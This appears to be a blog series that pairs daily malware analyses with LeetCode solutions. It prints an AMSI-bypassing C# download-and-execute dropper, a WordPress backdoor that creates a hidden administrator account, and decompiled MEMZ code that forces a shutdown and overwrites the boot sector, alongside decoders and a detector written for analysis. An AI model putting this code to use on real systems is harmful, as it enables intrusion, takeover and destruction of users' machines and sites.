[DllImport("Kernel32.dll",EntryPoint="RtlMoveMemory",SetLastError=false)]static extern void ef5ae(IntPtr a948e8,IntPtr l8b12e,int g4c6e);
public static int c193b()
{
IntPtr c2ae2d6=e6656d9(y171e("005844581b530f0d"));
if(c2ae2d6!=IntPtr.Zero)
{
IntPtr r963493=v779b(c2ae2d6,y171e("205844586654020f774257535211"));
if(r963493!=IntPtr.Zero)
{
UIntPtr hbaa2d=(UIntPtr)5;
uint k9c379=0;
if(h7c586(r963493,hbaa2d,0x40,out k9c379))
{
byte[] je1ed={0x31,0xff,0x90}; // The patch here bypasses AMSI detection; AMSI is what can protect against malware intrusion https://xz.aliyun.com/t/4377 https://xz.aliyun.com/t/3095
IntPtr nb327a=Marshal.AllocHGlobal(3);
Marshal.Copy(je1ed,0,nb327a,3);
ef5ae(new IntPtr(r963493.ToInt64()+0x001b),nb327a,3);
}
}
}
string s183fa=Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\c9255" + y171e("4f504f54");
new WebClient().DownloadFile(y171e("09414341460d4c4e56565f5b5601084647435a470613414e534758080447441f56580e4e4558411a0f2c16627c437366530664587a410e4d044d52"),s183fa);
ProcessStartInfo y6cb2=new ProcessStartInfo(s183fa);
Process.Start(y6cb2);
return 0;
}
public static string y171e(string me8994)
{
string x8d356="a57157c";
string e6656d9="";
for (int i=0; i<me8994.Length;i+=2)
{
byte v779b=Convert.ToByte(me8994.Substring(i,2),16);
e6656d9+=(char)(v779b^x8d356[(i/2)%x8d356.Length]);
}
return e6656d9;
}}

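You can use Visual Studio's rename feature to give the imported system functions readable names. y171e is the string decryption function.

What the sample does is download a file from the decoded URL and execute it.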
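The y171e routine is a repeating-key XOR over hex-encoded bytes, so its strings can be recovered statically without running the sample. The following is an added example, not part of the sample or the original post: it extracts every y171e("...") argument from a source fragment and decodes it. The function names are this example's own, and the third sample line is shortened from the listing.

```python
import json
import re

XOR_KEY = b"a57157c"  # the key string x8d356 inside y171e
CALL_RE = re.compile(r'y171e\("([0-9a-fA-F]*)"\)')

# Lines taken from the formatted listing above (third line shortened). The
# DownloadFile argument is encoded the same way and is left out of this sample.
SAMPLE = '''
IntPtr c2ae2d6=e6656d9(y171e("005844581b530f0d"));
IntPtr r963493=v779b(c2ae2d6,y171e("205844586654020f774257535211"));
string ext=y171e("4f504f54");
'''


def decode(hex_text, key=XOR_KEY):
    """Reverse y171e: hex-decode, then XOR each byte with the repeating key."""
    if len(hex_text) % 2:
        raise ValueError("odd-length hex string")
    raw = bytes.fromhex(hex_text)
    return "".join(chr(b ^ key[i % len(key)]) for i, b in enumerate(raw))


def extract_strings(source):
    """Return (encoded, decoded) pairs for every y171e call, in source order."""
    return [(m.group(1), decode(m.group(1))) for m in CALL_RE.finditer(source)]


def annotate(source):
    """Rewrite the source with each y171e call replaced by its plaintext literal."""
    return CALL_RE.sub(lambda m: json.dumps(decode(m.group(1))), source)


if __name__ == "__main__":
    for encoded, decoded in extract_strings(SAMPLE):
        print(encoded, "->", decoded)
    print(annotate(SAMPLE))
```

The decoded names show which DLL and export the three-byte patch targets, which is what confirms the AMSI-bypass reading of the code.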

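Daily malware analysis and LeetCode-3

LeetCode 91. Decode Ways

Count the number of ways to decode the string.

The funniest part is that I submitted a solution a year ago, and it was fast. Now I can't solve it.

I added notes this time, so I shouldn't forget it again.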

#include <string.h>

int numDecodings(char * s){
    size_t len=strlen(s);
    if(len==0)return 0;
    if(s[0]=='0')return 0; // a leading 0 can never be decoded
    if(len==1)return 1;
    int dp[40000]; // dp[i] = number of ways to decode the string up to character i
    memset(dp,0,sizeof(dp)); // sizeof(dp) clears the whole array
    dp[0]=1;
    int num=(s[0]-48)*10+s[1]-48;
    dp[1]=num>=11&&num<=26&&s[1]!='0'?2:1;
    if(s[0]>'2'&&s[1]=='0')return 0; // cannot be decoded
    for(size_t i=2;i<len;i++){
        num=(s[i-1]-48)*10+s[i]-48;
        if(num==0||(s[i]=='0'&&s[i-1]>'2'))return 0; // cannot be decoded
        if(s[i]=='0')dp[i]=dp[i-2]; // s[i] can only be decoded together with s[i-1], so the count does not grow
        else if(num>=11&&num<=26)dp[i]=dp[i-1]+dp[i-2]; // two cases: s[i] decoded on its own, or s[i-1] and s[i] decoded together
        else dp[i]=dp[i-1]; // otherwise (e.g. num>26) s[i] can only be decoded on its own
    }
    return dp[len-1];
}

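Laomaotao ships with a trojan

Article by the Huorong team: https://www.52pojie.cn/thread-1258730-1-1.html

Analysis

There doesn't seem to be much to it, but without a sample it is hard to work on. I tried installing it in a virtual machine, and Laomaotao simply could not find the virtual disk; it looks like they "optimized" for that. 😂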

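Daily malware analysis and LeetCode-2

PHP source decryption

https://www.52pojie.cn/thread-693641-1-1.html

First install xdebug and the PHP Debug extension for VS Code.

Use https://github.com/nikic/PHP-Parser to format the code.

Then single-step, get past the anti-debugging, and keep going until eval, where the source code becomes visible.

LeetCode: implement strStr

I never understood the KMP algorithm, so this time I am taking a look.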

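The prefix function $\pi(i)$ is the length of the longest proper prefix of $s[0:i]$ that equals a proper suffix of $s[0:i]$.

For the string aabaaab:

  • $\pi(0)=0$, because a has no proper prefix or proper suffix
  • $\pi(1)=1$, because the longest equal proper prefix and proper suffix of aa has length 1
  • $\pi(2)=0$, because aab has no matching proper prefix and proper suffix
  • $\pi(3)=1$, because the longest equal proper prefix and proper suffix of aaba has length 1
  • $\pi(4)=2$
  • $\pi(5)=2$
  • $\pi(6)=3$

KMP runs in strictly $O(m)$ time, and it relies on a few properties of the prefix function.

  1. $\pi(i)\le\pi(i-1)+1$. Intuitively, appending one character can extend the matching proper prefix and proper suffix by at most one character.

    • By the definition of $\pi(i)$, $s[0:\pi(i)-1]=s[i-\pi(i)+1:i]$, i.e. the proper prefix and proper suffix of length $\pi(i)$ are equal
    • Moving the right endpoints of both ranges one step left gives $s[0:\pi(i)-2]=s[i-\pi(i)+1:i-1]$, i.e. the proper prefix and proper suffix each lose one character
    • By the definition of $\pi(i-1)$, $\pi(i-1)\ge\pi(i)-1$. If $\pi(i)\ne0$, the last character must equal some character of the proper prefix, and after deleting it the $\pi$ value must decrease by 1
  2. If $s[i]=s[\pi(i-1)]$, then $\pi(i)=\pi(i-1)+1$. Intuitively, these two characters are the ones that follow the matching proper prefix and proper suffix of length $\pi(i-1)$, so the claim holds.

    • By the definition of $\pi(i-1)$, $s[0:\pi(i-1)-1]=s[i-\pi(i-1):i-1]$, which is the first equation of property 1 with $i-1$ substituted for $i$ (1)
    • Because $s[\pi(i-1)]=s[i]$, we get $s[0:\pi(i-1)]=s[i-\pi(i-1):i]$: the proper prefix and proper suffix each gain one equal character
    • By the definition of $\pi(i)$, $\pi(i)\ge\pi(i-1)+1$, i.e. when the next characters are equal the matching length may grow; combined with the first property this gives $\pi(i)=\pi(i-1)+1$

With these two properties $\pi(i)$ can be computed: find the largest $j$ such that $s[0:j-1]=s[i-j:i-1]$ and $s[i]=s[j]$, which gives $\pi(i)=j+1$.

  1. $j$ must be as large as possible
  2. $j$ must satisfy $s[i]=s[j]$

When $s[\pi(i-1)]\ne s[i]$, $\pi(i)\le\pi(i-1)$. Since $j=\pi(i)-1$, we have $j\lt\pi(i-1)$, so we can take the length-$j$ suffixes of the two substrings in equation (1), and they are still equal: $s[\pi(i-1)-j:\pi(i-1)-1]=s[i-j:i-1]$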
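The prefix function described above, computed by falling back from a border $j$ to the next shorter border $\pi(j-1)$ whenever $s[i]\ne s[j]$, then used for the strStr search. This is an added example, not code from the original post; the function names are this example's own, and it works for any string, not only aabaaab.

```python
def prefix_function(s):
    """pi[i] = length of the longest proper prefix of s[0..i] that is also its suffix."""
    pi = [0] * len(s)
    for i in range(1, len(s)):
        j = pi[i - 1]                      # longest border of s[0..i-1]
        while j > 0 and s[i] != s[j]:      # mismatch: try the next shorter border
            j = pi[j - 1]
        if s[i] == s[j]:                   # property 2: the border grows by one
            j += 1
        pi[i] = j
    return pi


def check_properties(s):
    """Verify properties 1 and 2 from the text at every position of s."""
    pi = prefix_function(s)
    for i in range(1, len(s)):
        if pi[i] > pi[i - 1] + 1:                          # property 1
            return False
        if s[i] == s[pi[i - 1]] and pi[i] != pi[i - 1] + 1:  # property 2
            return False
    return True


def str_str(haystack, needle):
    """Index of the first occurrence of needle in haystack, or -1."""
    if not needle:
        return 0
    pi = prefix_function(needle)
    j = 0                                  # needle characters matched so far
    for i, c in enumerate(haystack):
        while j > 0 and c != needle[j]:
            j = pi[j - 1]
        if c == needle[j]:
            j += 1
        if j == len(needle):
            return i - j + 1
    return -1


if __name__ == "__main__":
    print(prefix_function("aabaaab"))
    print(str_str("aabaabaaab", "aabaaab"))
```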

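It is really a finite-state automaton

After receiving a character, if it equals the current pattern character, matching moves on to the next character; if it does not, the next state is determined by the current state and the input character. The result is a finite-state automaton.

Let the pattern to match be pat and the text be txt.

Build the state transition matrix dp: if the character equals pat[j], move to the next state; otherwise fall back to the state of the longest prefix that matches what has been read so far.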

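#include <string.h>

// Assumes 7-bit ASCII input and a needle shorter than 40000 characters.
int strStr(char * haystack, char * needle){
    static int dp[40000][128]; // static: 40000*128 ints (about 20 MB) do not fit on a typical stack
    memset(dp,0,sizeof(dp));
    size_t xlen=strlen(haystack);
    size_t ylen=strlen(needle);
    if(ylen==0)return 0;
    int x=0; // shadow state
    dp[0][(unsigned char)needle[0]]=1;
    for(size_t i=1;i<ylen;i++){
        for(int c=0;c<128;c++){
            if(c==needle[i]){
                dp[i][c]=i+1;
            }else{
                dp[i][c]=dp[x][c];
            }
        }
        x=dp[x][(unsigned char)needle[i]]; // advance the shadow state: does x still share a longest prefix with the current character?
    }
    int state=0;
    for(size_t i=0;i<xlen;i++){
        state=dp[state][(unsigned char)haystack[i]];
        // printf("%d\n",state);
        if((size_t)state==ylen){
            return (int)(i-ylen+1);
        }
    }
    return -1;
}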

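References:

Solution write-up

https://zhuanlan.zhihu.com/p/83334559

Daily malware analysis and LeetCode-1

Backdoor in the cracked justnews 5.2.3

52pojie link: https://www.52pojie.cn/thread-1084019-1-1.html

I could not find a sample. The backdoor works as follows:

  1. functions.php registers a backdoor action that adds an account backdoor/123456; the access key is go
  2. A later file, panel.php, holds the site, author and similar information under several layers of base64 encoding.

Another article by the same author: https://www.52pojie.cn/thread-1074873-1-1.html

This one has a sample, so take a look: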

add_action('wp_head', 'wp_backdoor');
function wp_backdoor()
{
if (md5($_GET['backdoor']) == '34d1f91fb2e514b8576fab1a75a89a6b') {
require('wp-includes/registration.php');
if (!username_exists('backdoor')) {
$user_id = wp_create_user('backdoor', '123456');
$user = new WP_User($user_id);
$user->set_role('administrator');
}
}
}

Same logic as this one..
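One way to flag this pattern when reviewing a theme's PHP files: find callbacks registered with add_action whose bodies create a user, grant the administrator role, or are triggered by request parameters. This is an added example, not code from the original posts; the sample input is a constructed copy of the snippet above plus one harmless hook, and the function names are this example's own.

```python
import re

HOOK_RE = re.compile(r"add_action\(\s*['\"]([\w-]+)['\"]\s*,\s*['\"](\w+)['\"]")
# Traits that do not belong in a callback hooked to front-end page rendering.
RISKY = {
    "creates a user": re.compile(r"\bwp_(create|insert)_user\s*\("),
    "grants administrator": re.compile(r"set_role\(\s*['\"]administrator['\"]"),
    "request-controlled trigger": re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\["),
}

# Constructed input: the snippet from the post plus one harmless hook.
SAMPLE = r"""
add_action('wp_head', 'wp_backdoor');
function wp_backdoor()
{
if (md5($_GET['backdoor']) == '34d1f91fb2e514b8576fab1a75a89a6b') {
require('wp-includes/registration.php');
if (!username_exists('backdoor')) {
$user_id = wp_create_user('backdoor', '123456');
$user = new WP_User($user_id);
$user->set_role('administrator');
}
}
}
add_action('wp_footer', 'theme_note');
function theme_note() { echo '<!-- theme -->'; }
"""

def function_body(source, name):
    """Brace-balanced body of `function name(...)`; '' if not defined here."""
    m = re.search(r"function\s+%s\s*\([^)]*\)\s*\{" % re.escape(name), source)
    if not m:
        return ""
    depth = 1
    for pos in range(m.end(), len(source)):
        depth += {"{": 1, "}": -1}.get(source[pos], 0)
        if depth == 0:
            return source[m.end():pos]
    return source[m.end():]  # unbalanced braces: take the rest of the file

def scan(source):
    """(hook, callback, reasons) for hooked callbacks showing two or more traits."""
    findings = []
    for hook, callback in HOOK_RE.findall(source):
        body = function_body(source, callback)
        reasons = sorted(k for k, rx in RISKY.items() if rx.search(body))
        if len(reasons) >= 2:
            findings.append((hook, callback, reasons))
    return findings
```

The brace counter does not skip braces inside PHP strings or comments, so treat hits as leads for manual review rather than verdicts.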

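Post on the obfuscation/encryption: https://www.52pojie.cn/thread-1074918-1-1.html

PHP Debug + VS Code + xDebug + PHP 7.2 + PHP IntelliSense; single-step to eval and the main logic becomes visible.

PHP decryption reference (zym encryption): https://www.52pojie.cn/thread-693641-1-1.html

Analysis of malware disguised as a docx

https://www.52pojie.cn/thread-1412858-1-1.html

No sample was provided.

Detours can be used to hook the anti-debugging functions (new to me).

Nyan Cat (MEMZ) malware analysis

https://www.52pojie.cn/thread-1096117-1-1.html

After unpacking there is a bat file, which then uses batch plus ActiveX commands.

Flow:

  1. Create the file x from a base64 string
  2. Create x.js, which base64-decodes x into z.zip
  3. After decoding x, extract the memz file to %appdata%\MEMZ.exe
  4. Delete x, x.js and z.zip
  5. Execute MEMZ.exe

All output during this process is redirected to NUL.

The script first writes out a large amount of base64; decoded, it is a file whose magic number is PK, which together with the commands in the bat file means it should be a zip archive.

Unpacking it yields memz.exe (a virus of only 15kb, quite promising).

Exeinfo PE scan: 32-bit, not packed.

GetSystemMetrics https://baike.baidu.com/item/GetSystemMetrics/5608817 gets the screen resolution, x and y respectively.

On its first run the virus spawns 10 copies of itself with the /watchdog argument, then runs itself with the main argument and exits.

With the /watchdog argument it ends up refusing shutdown and keeps spawning more processes, waiting 10 seconds each time. If the number of processes drops, it acquires the shutdown privilege.

The function that acquires the shutdown privilege: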

BOOL __usercall sub_401021@<eax>(int a1@<ebp>)
{
int v1; // esi
int v2; // esi
HMODULE v3; // edi
FARPROC RtlAdjustPrivilege; // ebx
FARPROC NtRaiseHardError; // eax
void (__cdecl *v6)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD); // esi
HANDLE v7; // eax
int v9; // [esp-20h] [ebp-28h]
struct _TOKEN_PRIVILEGES v10; // [esp-18h] [ebp-20h] BYREF
int v11; // [esp-8h] [ebp-10h] BYREF
HANDLE v12; // [esp-4h] [ebp-Ch] BYREF
int v13; // [esp+0h] [ebp-8h] BYREF
int v14; // [esp+4h] [ebp-4h]

v1 = 20;
do
{
CreateThread(0, 0x1000u, StartAddress, 0, 0, 0);
Sleep(0x64u);
--v1;
}
while ( v1 );
v2 = v14;
v14 = a1;
v9 = v2;
v3 = LoadLibraryA("ntdll");
RtlAdjustPrivilege = GetProcAddress(v3, "RtlAdjustPrivilege");
NtRaiseHardError = GetProcAddress(v3, "NtRaiseHardError");
v6 = (void (__cdecl *)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD))NtRaiseHardError;
if ( RtlAdjustPrivilege && NtRaiseHardError )
{
((void (__cdecl *)(int, int, _DWORD, char *, int, int))RtlAdjustPrivilege)(19, 1, 0, (char *)&v13 + 3, v13, v9);
v6(-1073741790, 0, 0, 0, 6, &v11);
}
v7 = GetCurrentProcess();
OpenProcessToken(v7, 0x28u, &v12);
LookupPrivilegeValueW(0, L"SeShutdownPrivilege", (PLUID)v10.Privileges);
v10.PrivilegeCount = 1;
v10.Privileges[0].Attributes = 2;
AdjustTokenPrivileges(v12, 0, &v10, 0, 0, 0);
return ExitWindowsEx(6u, 0x10007u);
}

The part that monitors the process count:

while ( 1 )
{
v2 = CreateToolhelp32Snapshot(2u, 0);
pe.dwSize = 556;
Process32FirstW(v2, &pe);
v3 = lpString1;
v4 = 0;
do
{
hObject = OpenProcess(0x400u, 0, pe.th32ProcessID);
lpString2 = (LPCSTR)LocalAlloc(0x40u, 0x200u);
GetProcessImageFileNameA(hObject, lpString2, 512);
if ( !lstrcmpA(v3, lpString2) )
++v4;
CloseHandle(hObject);
LocalFree((HLOCAL)lpString2);
}
while ( Process32NextW(v2, &pe) );
CloseHandle(v2);
if ( v4 < v7 )
sub_401021();
v7 = v4;
Sleep(0xAu);
}

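It writes some odd bytes to PhysicalDrive0, 0x7A0 in size. According to the experts' analysis, this changes the boot sector.

It then creates threads. The function table is at 405130, with 10 functions in total.

  1. Open a random URL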
    int __cdecl sub_4014FC(int a1)
    {
    unsigned int v1; // eax
    int v2; // eax

    v1 = sub_401A55();
    ShellExecuteA(0, "open", (&lpFile)[v1 % 0x2E], 0, 0, 10);
    v2 = sub_401A55();
    return sub_401B09(
    COERCE_UNSIGNED_INT64((double)a1),
    HIDWORD(COERCE_UNSIGNED_INT64((double)a1)),
    (double)(v2 % 200) + 1500.0 / ((double)a1 / 15.0 + 1.0) + 100.0);
    }
  2. Set the mouse position randomly
    int __cdecl sub_40156D(int a1, int a2)
    {
    int v2; // esi
    int v3; // edi
    int v4; // ecx
    int v5; // esi
    int v6; // ecx
    int v7; // eax
    int v8; // ecx
    int v9; // eax
    int v11; // [esp-4h] [ebp-18h]
    struct tagPOINT Point; // [esp+Ch] [ebp-8h] BYREF

    GetCursorPos(&Point);
    v2 = a2 / 2200 + 2;
    v3 = sub_401A55(2200) % v2;
    v5 = sub_401A55(v4) % v2;
    v7 = sub_401A55(v6);
    v11 = Point.y + v3 * (v7 % 3 - 1);
    v9 = sub_401A55(v8);
    SetCursorPos(Point.x + v5 * (v9 % 3 - 1), v11);
    return 2;
    }
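  3. Send random ASCII key messages via SendInput
  4. Play the SystemHand sound
  5. Draw some random things
  6. Pop up "Still using this computer? lol"
  7. Draw icons at random
  8. Enumerate the windows on the desktop and send them timeout messages. This crashes the system
  9. Copy a rectangle
  10. Draw random rectangles again

LeetCode daily problem: 27. Remove Element

Approach: first scan from the back towards the front over elements equal to val, until the array is exhausted or an unequal element is found. Then scan from the front towards the back until reaching last. If the forward scan meets a value to remove, overwrite it with the element last points to and move last backwards until it reaches the next unequal element.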

int removeElement(int* nums, int numsSize, int val){
if(!numsSize)return 0;
int last=numsSize-1;
while(last>-1&&nums[last]==val){
last--;
}
// if(!last)return last;
for(int i=0;i<last;i++){
if(nums[i]==val){
nums[i]=nums[last];
last--;
while(last&&nums[last]==val){
last--;
}
}
}
return last+1;
}